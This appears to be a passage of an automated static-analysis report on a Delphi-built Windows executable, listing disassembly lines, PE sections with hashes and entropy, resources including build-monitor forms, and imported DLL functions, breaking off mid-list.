                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          call 00007FBF58C29C4Dh
                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov edx, 006DC240h
                                                                                                                          call 00007FBF58C296F4h
                                                                                                                          mov ecx, dword ptr [006EDCC8h]
                                                                                                                          mov eax, dword ptr [006EDDD4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov edx, dword ptr [006D3F6Ch]
                                                                                                                          call 00007FBF59C29C3Ch

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f9000 | 0x3f96 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x329000 | 0x1ef260 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x508c00 | 0x2918 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2ff000 | 0x29718 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2fe000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2f9bc8 | 0x9ac | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d9294 | 0x2d9400 | f170904968d3ed783b9857afe56d971d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x2db000 | 0x1250 | 0x1400 | 9be26a59bc8233b92ec9bd79fd07ff13 | False | 0.5412109375 | data | 6.099813281792287 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2dd000 | 0x11078 | 0x11200 | 256a4c2423eae8f79b8ed7215ca95be3 | False | 0.3919793567518248 | data | 4.519234114373622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x2ef000 | 0x9298 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2f9000 | 0x3f96 | 0x4000 | 59ebf4c01c9630c427cf9d4c8d4e72de | False | 0.312255859375 | data | 5.248510626082326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x2fd000 | 0xd8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2fe000 | 0x18 | 0x200 | bf0ac182db40dc29be077f98bf131377 | False | 0.052734375 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2ff000 | 0x29718 | 0x29800 | 977696233ec3926b686d0b5feb0a425f | False | 0.5087125847138554 | data | 6.690448253628545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x329000 | 0x1ef260 | 0x1ef400 | b3c5a3459f4cfe7e4d03cb542f60f1be | False | 0.8037331208985361 | data | 7.776375373000245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x32bf78 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x32c0ac | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x32c1e0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x32c314 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | Hebrew | Israel | 0.4675324675324675
RT_CURSOR | 0x32c448 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x32c57c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x32c6b0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_CURSOR | 0x32c7e4 | 0x134 | data | Hebrew | Israel | 0.3961038961038961
RT_CURSOR | 0x32c918 | 0x134 | data | Hebrew | Israel | 0.30194805194805197
RT_CURSOR | 0x32ca4c | 0x134 | data | Hebrew | Israel | 0.30194805194805197
RT_CURSOR | 0x32cb80 | 0x134 | data | English | United States | 0.38311688311688313
RT_BITMAP | 0x32ccb4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x32ce84 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x32d068 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x32d238 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x32d408 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x32d5d8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x32d7a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x32d978 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x32db48 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x32dd18 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x32dee8 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
RT_BITMAP | 0x32dfa8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
RT_BITMAP | 0x32e088 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
RT_BITMAP | 0x32e168 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
RT_BITMAP | 0x32e248 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
RT_BITMAP | 0x32e308 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
RT_BITMAP | 0x32e3c8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
RT_BITMAP | 0x32e4a8 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
RT_BITMAP | 0x32e568 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
RT_BITMAP | 0x32e648 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_BITMAP | 0x32e730 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
RT_BITMAP | 0x32e7f0 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | | | 0.35
RT_BITMAP | 0x32ed18 | 0xc0 | Device independent bitmap graphic, 11 x 11 x 4, image size 88 | Russian | Russia | 0.4479166666666667
RT_BITMAP | 0x32edd8 | 0xc0 | Device independent bitmap graphic, 11 x 11 x 4, image size 88 | Russian | Russia | 0.4479166666666667
RT_BITMAP | 0x32ee98 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | Russian | Russia | 0.35344827586206895
RT_BITMAP | 0x32ef80 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.2192622950819672
RT_BITMAP | 0x32f168 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.14959016393442623
RT_BITMAP | 0x32f350 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.1762295081967213
RT_BITMAP | 0x32f538 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.20901639344262296
RT_BITMAP | 0x32f720 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.2151639344262295
RT_BITMAP | 0x32f908 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.1680327868852459
RT_BITMAP | 0x32faf0 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.14549180327868852
RT_BITMAP | 0x32fcd8 | 0x1e8 | Device independent bitmap graphic, 44 x 16 x 4, image size 384 | | | 0.1557377049180328
RT_BITMAP | 0x32fec0 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256 | | | 0.36742424242424243
RT_BITMAP | 0x3303e8 | 0x518 | Device independent bitmap graphic, 16 x 15 x 8, image size 240 | | | 0.33588957055214724
RT_BITMAP | 0x330900 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.18863636363636363
RT_BITMAP | 0x330e28 | 0x518 | Device independent bitmap graphic, 16 x 15 x 8, image size 240 | | | 0.3581288343558282
RT_BITMAP | 0x331340 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3859 x 3859 px/m, 256 important colors | Russian | Russia | 0.13636363636363635
RT_BITMAP | 0x331868 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.09090909090909091
RT_BITMAP | 0x331d90 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256 | | | 0.36515151515151517
RT_BITMAP | 0x3322b8 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.10387323943661972
RT_BITMAP | 0x332960 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.09213615023474178
RT_BITMAP | 0x333008 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.10387323943661972
RT_BITMAP | 0x3336b0 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.0721830985915493
RT_BITMAP | 0x333d58 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.0698356807511737
RT_BITMAP | 0x334400 | 0x6a8 | Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m | | | 0.06924882629107981
RT_BITMAP | 0x334aa8 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256 | | | 0.33181818181818185
RT_BITMAP | 0x334fd0 | 0x108 | Device independent bitmap graphic, 10 x 7 x 24, image size 224 | | | 0.14772727272727273
RT_BITMAP | 0x3350d8 | 0x208 | Device independent bitmap graphic, 10 x 15 x 24, image size 480 | | | 0.13076923076923078
RT_BITMAP | 0x3352e0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | Russian | Russia | 0.3620689655172414
RT_BITMAP | 0x3353c8 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colors | Russian | Russia | 0.4682926829268293
RT_BITMAP | 0x335a30 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | | | 0.12954545454545455
RT_BITMAP | 0x335f58 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_BITMAP | 0x336040 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.24772727272727274
RT_BITMAP | 0x336568 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2898 x 2898 px/m, 256 important colors | | | 0.22575757575757577
RT_BITMAP | 0x336a90 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/m | Russian | Russia | 0.38362068965517243
RT_BITMAP | 0x336b78 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/m | Russian | Russia | 0.375
RT_BITMAP | 0x336c60 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2882 x 2882 px/m, 256 important colors | Russian | Russia | 0.21363636363636362
RT_BITMAP | 0x337188 | 0x518 | Device independent bitmap graphic, 16 x 15 x 8, image size 240 | | | 0.3581288343558282
RT_BITMAP | 0x3376a0 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.2878787878787879
RT_BITMAP | 0x337bc8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m | | | 0.3232758620689655
RT_BITMAP | 0x337cb0 | 0x1a8 | Device independent bitmap graphic, 40 x 16 x 4, image size 320 | | | 0.17688679245283018
RT_BITMAP | 0x337e58 | 0x1a8 | Device independent bitmap graphic, 40 x 16 x 4, image size 320 | | | 0.18160377358490565
RT_BITMAP | 0x338000 | 0x1a8 | Device independent bitmap graphic, 40 x 16 x 4, image size 320 | | | 0.18160377358490565
RT_BITMAP | 0x3381a8 | 0x1a8 | Device independent bitmap graphic, 40 x 16 x 4, image size 320 | | | 0.18160377358490565
RT_BITMAP | 0x338350 | 0x1a8 | Device independent bitmap graphic, 40 x 16 x 4, image size 320 | | | 0.18160377358490565
RT_BITMAP | 0x3384f8 | 0x1d0 | Device independent bitmap graphic, 44 x 15 x 4, image size 360 | | | 0.18318965517241378
RT_BITMAP | 0x3386c8 | 0x1d0 | Device independent bitmap graphic, 44 x 15 x 4, image size 360 | | | 0.18318965517241378
RT_BITMAP | 0x338898 | 0x1d0 | Device independent bitmap graphic, 44 x 15 x 4, image size 360 | | | 0.18318965517241378
RT_BITMAP | 0x338a68 | 0x1d0 | Device independent bitmap graphic, 44 x 15 x 4, image size 360 | | | 0.17456896551724138
RT_BITMAP | 0x338c38 | 0x1d0 | Device independent bitmap graphic, 44 x 15 x 4, image size 360 | | | 0.17025862068965517
RT_BITMAP | 0x338e08 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m | | | 0.3793103448275862
RT_BITMAP | 0x338ef0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/m | Russian | Russia | 0.38362068965517243
RT_BITMAP | 0x338fd8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/m | Russian | Russia | 0.375
RT_BITMAP | 0x3390c0 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | | | 0.4895833333333333
RT_BITMAP | 0x339180 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.2787878787878788
RT_BITMAP | 0x3396a8 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2819767441860465
RT_BITMAP | 0x339800 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.27906976744186046
RT_BITMAP | 0x339958 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2936046511627907
RT_BITMAP | 0x339ab0 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2936046511627907
RT_BITMAP | 0x339c08 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.3226744186046512
RT_BITMAP | 0x339d60 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2616279069767442
RT_BITMAP | 0x339eb8 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2877906976744186
RT_BITMAP | 0x33a010 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2761627906976744
RT_BITMAP | 0x33a168 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.3081395348837209
RT_BITMAP | 0x33a2c0 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.3023255813953488
RT_BITMAP | 0x33a418 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2761627906976744
RT_BITMAP | 0x33a570 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.29069767441860467
RT_BITMAP | 0x33a6c8 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.24709302325581395
RT_BITMAP | 0x33a820 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.3081395348837209
RT_BITMAP | 0x33a978 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.27325581395348836
RT_BITMAP | 0x33aad0 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.26744186046511625
RT_BITMAP | 0x33ac28 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2877906976744186
RT_BITMAP | 0x33ad80 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2877906976744186
RT_BITMAP | 0x33aed8 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.2703488372093023
RT_BITMAP | 0x33b030 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.26744186046511625
RT_BITMAP | 0x33b188 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | | | 0.26453488372093026
RT_BITMAP | 0x33b2e0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m | | | 0.31896551724137934
RT_BITMAP | 0x33b3c8 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256 | Russian | Russia | 0.31212121212121213
RT_BITMAP | 0x33b8f0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | Russian | Russia | 0.41810344827586204
RT_BITMAP | 0x33b9d8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | Russian | Russia | 0.3706896551724138
RT_BITMAP | 0x33bac0 | 0x528 | Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors | Russian | Russia | 0.23863636363636365
RT_BITMAP | 0x33bfe8 | 0x118 | Device independent bitmap graphic, 7 x 10 x 24, image size 240 | | | 0.1357142857142857
RT_BITMAP | 0x33c100 | 0x2c8 | Device independent bitmap graphic, 31 x 7 x 24, image size 672 | | | 0.09691011235955056
RT_BITMAP | 0x33c3c8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.3794642857142857
RT_ICON | 0x33c4a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2402482269503546
RT_ICON | 0x33c910 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09943714821763602
RT_ICON | 0x33d9b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2402482269503546
RT_ICON | 0x33de20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09943714821763602
RT_DIALOG | 0x33eec8 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x33ef1c | 0x52 | data | | | 0.7560975609756098
                                                                                                                          RT_STRING0x33ef700x2d4data0.3798342541436464
                                                                                                                          RT_STRING0x33f2440x238data0.522887323943662
                                                                                                                          RT_STRING0x33f47c0x188data0.5051020408163265
                                                                                                                          RT_STRING0x33f6040xd0StarOffice Gallery theme o, 1929405696 objects, 1st N0.6538461538461539
                                                                                                                          RT_STRING0x33f6d40x150data0.5
                                                                                                                          RT_STRING0x33f8240x4f4data0.3667192429022082
                                                                                                                          RT_STRING0x33fd180x2c4data0.461864406779661
                                                                                                                          RT_STRING0x33ffdc0x45cdata0.4211469534050179
                                                                                                                          RT_STRING0x3404380xd8data0.6666666666666666
                                                                                                                          RT_STRING0x3405100xd8data0.6574074074074074
                                                                                                                          RT_STRING0x3405e80x188data0.5408163265306123
                                                                                                                          RT_STRING0x3407700x3d8data0.41565040650406504
                                                                                                                          RT_STRING0x340b480x3b8data0.39285714285714285
                                                                                                                          RT_STRING0x340f000x3e0data0.37701612903225806
                                                                                                                          RT_STRING0x3412e00x36cdata0.3538812785388128
                                                                                                                          RT_STRING0x34164c0x378data0.40540540540540543
                                                                                                                          RT_STRING0x3419c40xc4data0.6173469387755102
                                                                                                                          RT_STRING0x341a880x9cdata0.6346153846153846
                                                                                                                          RT_STRING0x341b240x2d4data0.44751381215469616
                                                                                                                          RT_STRING0x341df80x434data0.34107806691449816
                                                                                                                          RT_STRING0x34222c0x2ecdata0.37566844919786097
                                                                                                                          RT_STRING0x3425180x304data0.3432642487046632
                                                                                                                          RT_RCDATA0x34281c0x10data1.5
                                                                                                                          RT_RCDATA0x34282c0xe04data0.5638238573021181
                                                                                                                          RT_RCDATA0x3436300xe5cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029923830250271
                                                                                                                          RT_RCDATA0x34448c0x1f8PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0158730158730158
                                                                                                                          RT_RCDATA0x3446840x19aPNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.002439024390244
                                                                                                                          RT_RCDATA0x3448200xcbdPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.003373198405397
                                                                                                                          RT_RCDATA0x3454e00xd21PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0032728354656353
                                                                                                                          RT_RCDATA0x3462040xccbPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0033587786259541
                                                                                                                          RT_RCDATA0x346ed00x1e5PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0185567010309278
                                                                                                                          RT_RCDATA0x3470b80x1f6PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0179282868525896
                                                                                                                          RT_RCDATA0x3472b00xe5dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029915692140332
                                                                                                                          RT_RCDATA0x3481100x43cf6Delphi compiled form 'TAgentFindForm'0.9157911791179117
                                                                                                                          RT_RCDATA0x38be080x617Delphi compiled form 'TBevelTitle'0.43617703656189866
                                                                                                                          RT_RCDATA0x38c4200x3d6Delphi compiled form 'TBuildMonitorDialogWithLinkForm'0.47963340122199594
                                                                                                                          RT_RCDATA0x38c7f80x4481aDelphi compiled form 'TBuildMonitorForm_'0.9107490324374025
                                                                                                                          RT_RCDATA0x3d10140x43c17Delphi compiled form 'TFindBarForm'0.9161991445877338
                                                                                                                          RT_RCDATA0x414c2c0x4b2Delphi compiled form 'TfrmBuildReport'0.5099833610648918
                                                                                                                          RT_RCDATA0x4150e00x3a3Delphi compiled form 'TInputDialog'0.5445757250268528
                                                                                                                          RT_RCDATA0x4154840x43687Delphi compiled form 'TMonitorGraphListForm'0.9217067543634079
                                                                                                                          RT_RCDATA0x458b0c0x7a34aDelphi compiled form 'TMonitorViewForm'0.6451651570060373
                                                                                                                          RT_RCDATA0x4d2e580x441a0Delphi compiled form 'TOpenBuildMonFileDialog'0.9121830905127911
                                                                                                                          RT_RCDATA0x516ff80x573Delphi compiled form 'TSaveAttachmentsForm'0.45878136200716846
                                                                                                                          RT_GROUP_CURSOR0x51756c0x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175800x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175940x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175a80x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                          RT_GROUP_CURSOR0x5175d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                          RT_GROUP_CURSOR0x5175e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5175f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x51760c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5176200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5176340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_ICON0x5176480x22dataEnglishUnited States0.9411764705882353
                                                                                                                          RT_GROUP_ICON0x51766c0x22dataEnglishUnited States1.0294117647058822
                                                                                                                          RT_VERSION0x5176900x328dataEnglishUnited States0.44554455445544555
                                                                                                                          RT_MANIFEST0x5179b80x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                                                                                          RT_MANIFEST0x517fc80x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, CreateDirectoryA, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TabbedTextOutA, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, 